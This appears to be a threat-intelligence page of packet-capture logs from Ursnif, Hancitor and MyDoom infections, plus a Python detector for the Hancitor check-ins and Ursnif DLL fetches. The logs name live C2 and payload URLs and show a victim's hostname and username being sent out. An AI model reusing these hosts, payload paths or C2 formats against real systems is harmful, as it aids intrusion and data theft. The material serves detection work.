Text Example

zzz.exe Delivers Ursnif Gozi Malware Banking Trojan PCAP File Download Traffic Sample GET /mozglue.dll

Latest indicators of compromise from our Ursnif IOC feed. Ursnif (aka Gozi, aka ISFB) is a banking trojan targeting users in the USA and Europe. It was designed for the primary purpose of perpetrating fraud.

Fast, accurate identification of commodity malware like Ursnif allows SOC teams to focus efforts on hunting for more highly targeted and stealthy malware. By quickly blocking, de-prioritizing and filtering out the noise associated with mass distributed malware and crimeware, our Threat Intelligence Feed allows you to focus on the threats that matter to your organization.

2019-10-03 06:01:00.812050 IP 192.168.86.25.53425 > 104.27.161.249.80: Flags [P.], seq 3229838630:3229839201, ack 2872661083, win 16450, length 571: HTTP: GET /tmp/zzz.exe HTTP/1.1
GET /tmp/zzz.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=120970-
Unless-Modified-Since: Thu, 03 Oct 2019 02:07:13 GMT
If-Range: "1e1000-593f80b3c67d3"
Host: redmoscow.info
Connection: Keep-Alive
Cookie: __cfduid=df482dfbd65d8b46f1c87aacc388aec4a1570096931

2019-10-03 06:01:04.855775 IP 104.27.161.249.80 > 192.168.86.25.53425: Flags [P.], seq 1848473:1849587, ack 571, win 30, length 1114: HTTP
2019-10-03 06:01:19.120810 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 2196019561:2196020046, ack 311058881, win 16514, length 485: HTTP: POST /223 HTTP/1.1
POST /223 HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: keitbeschutzen.com
Connection: Keep-Alive
Cache-Control: no-cache

--1BEF0A57BE110FD467A--

2019-10-03 06:01:19.279627 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 1:314, ack 485, win 233, length 313: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2019 10:02:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


2019-10-03 06:01:19.284253 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 485:842, ack 314, win 16435, length 357: HTTP: GET /freebl3.dll HTTP/1.1
GET /freebl3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive
2019-10-03 06:01:20.010931 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 264538:265974, ack 842, win 242, length 1436: HTTP
2019-10-03 06:01:20.126700 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 330594:332030, ack 842, win 242, length 1436: HTTP
2019-10-03 06:01:20.126720 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 334902:334952, ack 842, win 242, length 50: HTTP
2019-10-03 06:01:20.127904 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 842:1199, ack 334952, win 65047, length 357: HTTP: GET /mozglue.dll HTTP/1.1
GET /mozglue.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive
2019-10-03 06:01:20.253950 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 471372:472470, ack 1199, win 250, length 1098: HTTP
2019-10-03 06:01:20.255368 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1199:1557, ack 472470, win 65338, length 358: HTTP: GET /msvcp140.dll HTTP/1.1
GET /msvcp140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:20.626528 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 912210:912940, ack 1557, win 258, length 730: HTTP
2019-10-03 06:01:20.627701 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1557:1911, ack 912940, win 65338, length 354: HTTP: GET /nss3.dll HTTP/1.1
GET /nss3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:21.378227 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2159388:2159452, ack 1911, win 267, length 64: HTTP

2019-10-03 06:01:21.379453 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1911:2269, ack 2159452, win 65322, length 358: HTTP: GET /softokn3.dll HTTP/1.1
GET /softokn3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:21.529860 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2304488:2304650, ack 2269, win 275, length 162: HTTP
2019-10-03 06:01:21.530760 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 2269:2631, ack 2304650, win 65338, length 362: HTTP: GET /vcruntime140.dll HTTP/1.1
GET /vcruntime140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:21.660746 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2387938:2388783, ack 2631, win 283, length 845: HTTP
2019-10-03 06:01:21.989504 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2387938:2388783, ack 2631, win 283, length 845: HTTP

Hancitor Amadey Pony Malware Trojan Downloader Cobalt-Strike PCAP Download Traffic Sample todratsake.ru 31.44.184.33

2019-07-25 13:00:40.697356 IP 10.7.25.101.54392 > 10.7.25.1.53: 3214+ A? codeotso.com. (30)
2019-07-25 13:00:40.963731 IP 10.7.25.1.53 > 10.7.25.101.54392: 3214 1/0/0 A 83.220.175.185 (46)
2019-07-25 13:00:40.988041 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [S], seq 1865439027, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-25 13:00:41.166747 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [S.], seq 1917710723, ack 1865439028, win 64240, options [mss 1460], length 0
2019-07-25 13:00:41.167101 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [.], ack 1, win 64240, length 0
2019-07-25 13:00:41.167225 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [P.], seq 1:231, ack 1, win 64240, length 230: HTTP: POST /f5lkB/index.php HTTP/1.1
POST /f5lkB/index.php HTTP/1.1
Host: codeotso.com
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

id=3967861396&sd=fdf0b4&vs=1.41&ar=0&bi=1&lv=0&os=9&av=0&pc=HIDDENROAD-PC&un=richy.richardson&
2019-07-25 13:00:41.167370 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [.], ack 231, win 64240, length 0
2019-07-25 13:00:41.371519 IP 83.220.175.185.80 > 10.7.25.101.49158: Flags [P.], seq 1:257, ack 231, win 64240, length 256: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Thu, 25 Jul 2019 17:00:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45

40
1000094001http://material-nerud.ru/wp-includes/pomo/p.exe#
0
2019-07-25 13:00:41.699548 IP 10.7.25.1.53 > 10.7.25.101.51988: 29514 1/0/0 A 77.120.115.221 (48)
2019-07-25 13:00:41.701189 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [S], seq 1365560241, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-25 13:00:41.795556 IP 10.7.25.1.53 > 10.7.25.101.54927: 19539 1/0/0 A 92.53.96.153 (51)
2019-07-25 13:00:41.879144 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [S.], seq 172257877, ack 1365560242, win 64240, options [mss 1460], length 0
2019-07-25 13:00:41.879331 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [.], ack 1, win 64240, length 0
2019-07-25 13:00:41.879428 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [P.], seq 1:233, ack 1, win 64240, length 232: HTTP: POST /f5lkB/index.php HTTP/1.1
POST /f5lkB/index.php HTTP/1.1
Host: fordifortti.ru
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

id=3967861396&sd=fdf0b4&vs=1.41&ar=0&bi=1&lv=0&os=9&av=0&pc=HIDDENROAD-PC&un=richy.richardson&
2019-07-25 13:00:41.879503 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [.], ack 233, win 64240, length 0
2019-07-25 13:00:41.943752 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [S], seq 3529323204, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-25 13:00:42.103552 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [S.], seq 2378334524, ack 3529323205, win 64240, options [mss 1460], length 0
2019-07-25 13:00:42.103869 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [.], ack 1, win 64240, length 0
2019-07-25 13:00:42.104328 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [P.], seq 1:327, ack 1, win 64240, length 326: HTTP: GET /wp-includes/pomo/p.exe HTTP/1.1
GET /wp-includes/pomo/p.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: material-nerud.ru
Connection: Keep-Alive

2019-07-25 13:00:42.104455 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [.], ack 327, win 64240, length 0
2019-07-25 13:00:42.113973 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [P.], seq 1:198, ack 233, win 64240, length 197: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Thu, 25 Jul 2019 17:00:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45

6

0

2019-07-25 13:00:42.114334 IP 10.7.25.101.49159 > 77.120.115.221.80: Flags [F.], seq 233, ack 198, win 64043, length 0
2019-07-25 13:00:42.114462 IP 77.120.115.221.80 > 10.7.25.101.49159: Flags [.], ack 234, win 64239, length 0
2019-07-25 13:00:42.275225 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [P.], seq 1:1347, ack 327, win 64240, length 1346: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 25 Jul 2019 17:00:35 GMT
Content-Type: application/octet-stream
Content-Length: 300032
Last-Modified: Thu, 25 Jul 2019 14:50:21 GMT
Connection: keep-alive
ETag: "5d39c1ad-49400"
Expires: Sun, 25 Aug 2019 17:00:35 GMT
Cache-Control: max-age=2678400
Accept-Ranges: bytes

2019-07-25 13:05:46.182168 IP 10.7.25.101.49179 > 94.124.9.53.80: Flags [P.], seq 1:342, ack 1, win 64240, length 341: HTTP: GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: dobresmaki.eu
Connection: Keep-Alive

2019-07-25 13:05:46.182269 IP 94.124.9.53.80 > 10.7.25.101.49179: Flags [.], ack 342, win 64240, length 0
2019-07-25 13:05:46.184001 IP 94.124.9.53.80 > 10.7.25.101.49180: Flags [S.], seq 2287068635, ack 1286805230, win 64240, options [mss 1460], length 0
2019-07-25 13:05:46.184189 IP 10.7.25.101.49180 > 94.124.9.53.80: Flags [.], ack 1, win 64240, length 0
2019-07-25 13:05:46.184358 IP 10.7.25.101.49180 > 94.124.9.53.80: Flags [P.], seq 1:342, ack 1, win 64240, length 341: HTTP: GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
GET /wp-content/plugins/duplicate-post/art.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: dobresmaki.eu
Connection: Keep-Alive

2019-07-25 13:05:46.184449 IP 94.124.9.53.80 > 10.7.25.101.49180: Flags [.], ack 342, win 64240, length 0
2019-07-25 13:05:46.211149 IP 83.220.175.185.80 > 10.7.25.101.49178: Flags [FP.], seq 198, ack 232, win 64239, length 0
2019-07-25 13:05:46.211404 IP 10.7.25.101.49178 > 83.220.175.185.80: Flags [.], ack 199, win 64043, length 0
2019-07-25 13:05:46.346765 IP 94.124.9.53.80 > 10.7.25.101.49179: Flags [P.], seq 1:1347, ack 342, win 64240, length 1346: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Thu, 25 Jul 2019 17:05:39 GMT
Server: Apache
Last-Modified: Tue, 23 Jul 2019 10:59:38 GMT
Accept-Ranges: bytes
Content-Length: 110592
Connection: close
Content-Type: application/x-msdownload

2019-07-25 13:05:46.540594 IP 10.7.25.101.49182 > 77.120.115.221.80: Flags [P.], seq 1:152, ack 1, win 64240, length 151: HTTP: POST /f5lkB/index.php HTTP/1.1
POST /f5lkB/index.php HTTP/1.1
Host: todratsake.ru
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

e0=1000101001&
2019-07-25 13:05:46.540724 IP 77.120.115.221.80 > 10.7.25.101.49182: Flags [.], ack 152, win 64240, length 0
2019-07-25 13:05:47.588118 IP 10.7.25.101.49184 > 31.44.184.33.80: Flags [P.], seq 1:201, ack 1, win 64240, length 200: HTTP: GET /H7mp HTTP/1.1
GET /H7mp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3; .NET CLR 2.0.50727)
Host: 31.44.184.33
Connection: Keep-Alive
Cache-Control: no-cache

2019-07-25 13:05:47.588274 IP 31.44.184.33.80 > 10.7.25.101.49184: Flags [.], ack 201, win 64240, length 0
2019-07-25 13:05:47.646083 IP 83.220.175.185.80 > 10.7.25.101.49185: Flags [S.], seq 1514318061, ack 732422481, win 64240, options [mss 1460], length 0
2019-07-25 13:05:47.646247 IP 10.7.25.101.49185 > 83.220.175.185.80: Flags [.], ack 1, win 64240, length 0
2019-07-25 13:05:47.646312 IP 10.7.25.101.49185 > 83.220.175.185.80: Flags [P.], seq 1:151, ack 1, win 64240, length 150: HTTP: POST /f5lkB/index.php HTTP/1.1
POST /f5lkB/index.php HTTP/1.1
Host: codeotso.com
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

d1=1000101001&
2019-07-25 13:05:47.646371 IP 83.220.175.185.80 > 10.7.25.101.49185: Flags [.], ack 151, win 64240, length 0
2019-07-25 13:05:47.662936 IP 10.7.25.101.49186 > 31.44.184.33.80: Flags [S], seq 291674496, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-25 13:05:47.758694 IP 77.120.115.221.80 > 10.7.25.101.49183: Flags [FP.], seq 187, ack 154, win 64239, length 0
2019-07-25 13:05:47.758957 IP 10.7.25.101.49183 > 77.120.115.221.80: Flags [.], ack 188, win 64054, length 0
2019-07-25 13:05:47.763295 IP 31.44.184.33.80 > 10.7.25.101.49184: Flags [P.], seq 1:122, ack 201, win 64240, length 121: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Date: Thu, 25 Jul 2019 21:05:22 GMT
Content-Length: 210944

2019-07-25 13:05:48.827934 IP 10.7.25.101.49187 > 31.44.184.33.80: Flags [P.], seq 1:368, ack 1, win 64240, length 367: HTTP: GET /visit.js HTTP/1.1
GET /visit.js HTTP/1.1
Accept: */*
Cookie: D6CFR6fSx/2pSZ6OGAbt8JcWC6fjnf0iRH/lXdUuFoUeISeBOx4dHDkZGpLFCgSVAKGsc73GvXP0V+JT4J/NSi6vVSuEzjcFPy8q5lYtHAmcacE1cATGok6yawYmMTtyhx2I0swd+ECPu/GZEjnwuxElE6bQjaa4PTvKsU3FWt4=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: 31.44.184.33
Connection: Keep-Alive
Cache-Control: no-cache
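
As an added example (not code from this page or from the feed it describes), a small detector that parses tcpdump -A request blocks like the ones above and flags the two patterns these captures show: the Hancitor form post to /f5lkB/index.php that leaks the victim hostname (pc=) and username (un=) plus its short numeric follow-up posts, and an Ursnif-style client pulling several of the Mozilla NSS and VC runtime DLLs from one host in quick succession. The lines in SAMPLE are constructed from the captures on this page; the 60-second window, the three-DLL threshold and the ack regex are assumptions of mine, not documented Hancitor or Ursnif behaviour.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs
# Constructed sample in the tcpdump -A layout of this page (summary line ending in the request
# line, headers, blank line, body), using the hosts, paths and bodies of the Hancitor and Ursnif
# captures above; the last request is a benign control that must not be flagged.
SAMPLE = """\
2019-07-25 13:00:41.167225 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [P.], seq 1:231, ack 1, win 64240, length 230: HTTP: POST /f5lkB/index.php HTTP/1.1
Host: codeotso.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

id=3967861396&sd=fdf0b4&vs=1.41&ar=0&bi=1&lv=0&os=9&av=0&pc=HIDDENROAD-PC&un=richy.richardson&
2019-07-25 13:05:46.540594 IP 10.7.25.101.49182 > 77.120.115.221.80: Flags [P.], seq 1:152, ack 1, win 64240, length 151: HTTP: POST /f5lkB/index.php HTTP/1.1
Host: todratsake.ru
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

e0=1000101001&
2019-10-03 06:01:19.284253 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 485:842, ack 314, win 16435, length 357: HTTP: GET /freebl3.dll HTTP/1.1
Host: keitbeschutzen.com

2019-10-03 06:01:20.127904 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 842:1199, ack 334952, win 65047, length 357: HTTP: GET /mozglue.dll HTTP/1.1
Host: keitbeschutzen.com

2019-10-03 06:01:20.627701 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1557:1911, ack 912940, win 65338, length 354: HTTP: GET /nss3.dll HTTP/1.1
Host: keitbeschutzen.com

2019-10-03 06:02:00.000000 IP 192.168.86.40.51000 > 203.0.113.5.80: Flags [P.], seq 1:200, ack 1, win 64240, length 199: HTTP: GET /index.html HTTP/1.1
Host: example.net
"""

PACKET_RE = re.compile(r"^\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+ IP ")
REQUEST_RE = re.compile(r"^(?P<ts>\S+ \S+) IP (?P<src>\S+) > (?P<dst>\S+): .*"
                        r"HTTP: (?P<method>GET|POST) (?P<path>\S+) HTTP/1\.[01]$")
HEADER_RE = re.compile(r"^([A-Za-z][\w-]*): ?(.*)$")

def parse_requests(text):
    """Collect HTTP requests (summary, headers, body) from tcpdump -A text; other packets are skipped."""
    reqs, cur, in_headers = [], None, False
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m:
            cur = {"ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
                   "client": m["src"].rsplit(".", 1)[0], "server": m["dst"].rsplit(".", 1)[0],
                   "method": m["method"], "path": m["path"], "headers": {}, "body": ""}
            reqs.append(cur)
            in_headers = True
        elif PACKET_RE.match(line):
            cur = None                       # any other packet ends the current request
        elif cur is not None and in_headers:
            h = HEADER_RE.match(line)
            if h:
                cur["headers"][h.group(1).lower()] = h.group(2)
            in_headers = bool(h)             # first non-header line (the blank) ends the block
        elif cur is not None and line and not cur["body"] and cur["headers"].get("content-length", "0") != "0":
            cur["body"] = line               # first line after the headers is the form body
    return reqs

HANCITOR_KEYS = {"id", "sd", "vs", "pc", "un"}        # fields of the check-in body shown above
HANCITOR_ACK_RE = re.compile(r"^[a-z]\d=\d{10}&$")   # assumed shape of the e0=/d1= follow-up posts
URSNIF_DLLS = {"freebl3.dll", "mozglue.dll", "msvcp140.dll", "nss3.dll",
               "softokn3.dll", "vcruntime140.dll"}   # DLLs fetched after zzz.exe ran

def hancitor_findings(reqs):
    """Flag form posts to .../index.php whose body has the Hancitor check-in fields or the ack shape."""
    out = []
    for r in reqs:
        if (r["method"] != "POST" or not r["path"].endswith("/index.php") or
                not r["headers"].get("content-type", "").startswith("application/x-www-form-urlencoded")):
            continue
        q, host = parse_qs(r["body"]), r["headers"].get("host", r["server"])
        if HANCITOR_KEYS <= set(q):                   # pc= and un= leak the victim hostname and user
            out.append(("hancitor-checkin", r["client"], host, q["pc"][0], q["un"][0]))
        elif HANCITOR_ACK_RE.match(r["body"]):
            out.append(("hancitor-ack", r["client"], host, r["body"]))
    return out

def ursnif_dll_findings(reqs, window_seconds=60, min_distinct=3):
    """Flag one client pulling several NSS / VC runtime DLLs from one host inside a short window."""
    seen = defaultdict(list)                          # (client, host) -> [(ts, dll)]
    for r in reqs:
        dll = r["path"].rsplit("/", 1)[-1].lower()
        if r["method"] == "GET" and dll in URSNIF_DLLS:
            seen[(r["client"], r["headers"].get("host", r["server"]))].append((r["ts"], dll))
    out = []
    for (client, host), hits in seen.items():
        hits.sort()
        names = sorted({d for _, d in hits})
        if len(names) >= min_distinct and (hits[-1][0] - hits[0][0]).total_seconds() <= window_seconds:
            out.append(("ursnif-dll-fetch", client, host, names))
    return out

def scan(text):
    reqs = parse_requests(text)
    return hancitor_findings(reqs) + ursnif_dll_findings(reqs)

print(*scan(SAMPLE), sep="\n")
```

Feeding real tcpdump -A output to scan() works as long as each request's summary line keeps the "HTTP: GET|POST ..." tail; the header-byte garbage tcpdump prints before the request line is ignored by the parser.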

MyDoom DDoS $38 Billion Dollar P2P Malware Botnet PCAP Download Traffic Sample

MyDoom Botnet

MyDoom has several methods of impact, but its main attacks are DDoS.
MyDoom uses a DGA for its P2P communications, but also some command and control servers.

An estimated $38.7 billion in damage was caused by MyDoom, the fastest-spreading malware, to Microsoft Windows-based computers. Spyware is a deadly kind of malware that extracts a company's confidential information without the company's awareness.

2019-07-15 13:00:22.289866 IP 10.7.15.101.51171 > 10.7.15.1.53: 48767+ MX? acm.org. (25)
2019-07-15 13:00:22.340366 IP 10.7.15.1.53 > 10.7.15.101.51171: 48767 1/0/0 MX mail.mailroute.net. 10 (59)
2019-07-15 13:00:22.348650 IP 10.7.15.101.53658 > 10.7.15.1.53: 65013+ A? mail.mailroute.net. (36)
2019-07-15 13:00:22.382026 IP 10.7.15.1.53 > 10.7.15.101.53658: 65013 2/0/0 A 199.89.1.120, A 199.89.3.120 (68)
2019-07-15 13:00:22.382637 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [S], seq 3423424506, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-15 13:00:22.501570 IP 199.89.1.120.25 > 10.7.15.101.49163: Flags [S.], seq 2591540629, ack 3423424507, win 64240, options [mss 1460], length 0
2019-07-15 13:00:22.501779 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [.], ack 1, win 64240, length 0
2019-07-15 13:00:22.824195 IP 199.89.1.120.25 > 10.7.15.101.49163: Flags [P.], seq 1:66, ack 1, win 64240, length 65: SMTP: 220-in-014.lax.mailroute.net ESMTP Postfix – Postscreen enabled
220-in-014.lax.mailroute.net ESMTP Postfix – Postscreen enabled

2019-07-15 13:00:22.928682 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [.], ack 66, win 64175, length 0
2019-07-15 13:00:24.456432 IP 10.7.15.101.49164 > 157.130.29.226.1042: Flags [S], seq 824150712, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-15 13:00:24.924489 IP 10.7.15.101.62796 > 10.7.15.1.53: 51271+ MX? lists.freedesktop.org. (39)
2019-07-15 13:00:24.988231 IP 10.7.15.101.53695 > 10.7.15.1.53: 22968+ MX? global.libreoffice.org. (40)
2019-07-15 13:00:25.049108 IP 10.7.15.101.57533 > 10.7.15.1.53: 46764+ MX? global.libreoffice.org. (40)
2019-07-15 13:00:25.112279 IP 10.7.15.101.61829 > 10.7.15.1.53: 57956+ MX? documentfoundation.org. (40)
2019-07-15 13:00:25.174765 IP 10.7.15.101.53237 > 10.7.15.1.53: 64071+ MX? libreoffice.org. (33)
2019-07-15 13:00:25.237468 IP 10.7.15.101.50685 > 10.7.15.1.53: 56734+ MX? libreoffice.org. (33)
2019-07-15 13:00:25.939540 IP 10.7.15.101.62796 > 10.7.15.1.53: 51271+ MX? lists.freedesktop.org. (39)
2019-07-15 13:00:26.001128 IP 10.7.15.101.53695 > 10.7.15.1.53: 22968+ MX? global.libreoffice.org. (40)
2019-07-15 13:00:26.062827 IP 10.7.15.101.57533 > 10.7.15.1.53: 46764+ MX? global.libreoffice.org. (40)
2019-07-15 13:00:26.126226 IP 10.7.15.101.61829 > 10.7.15.1.53: 57956+ MX? documentfoundation.org. (40)
2019-07-15 13:00:26.187392 IP 10.7.15.101.53237 > 10.7.15.1.53: 64071+ MX? libreoffice.org. (33)
2019-07-15 13:00:30.460095 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 1:54, ack 1, win 64240, length 53: SMTP: 220 gabe.freedesktop.org ESMTP Postfix (Debian/GNU)
220 gabe.freedesktop.org ESMTP Postfix (Debian/GNU)

2019-07-15 13:00:30.460605 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 1:15, ack 54, win 64187, length 14: SMTP: EHLO acm.org
EHLO acm.org

2019-07-15 13:00:30.460715 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 15, win 64240, length 0
2019-07-15 13:00:30.541199 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [S.], seq 678655145, ack 2272612538, win 64240, options [mss 1460], length 0
2019-07-15 13:00:30.541436 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [.], ack 1, win 64240, length 0
2019-07-15 13:00:30.601674 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 54:197, ack 15, win 64240, length 143: SMTP: 250-gabe.freedesktop.org
250-gabe.freedesktop.org
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN

2019-07-15 13:00:30.602630 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 15:43, ack 197, win 64044, length 28: SMTP: MAIL FROM:fdrake@acm.org
MAIL FROM:fdrake@acm.org

2019-07-15 13:00:30.602753 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 43, win 64240, length 0
2019-07-15 13:00:30.735767 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 197:211, ack 43, win 64240, length 14: SMTP: 250 2.1.0 Ok
250 2.1.0 Ok

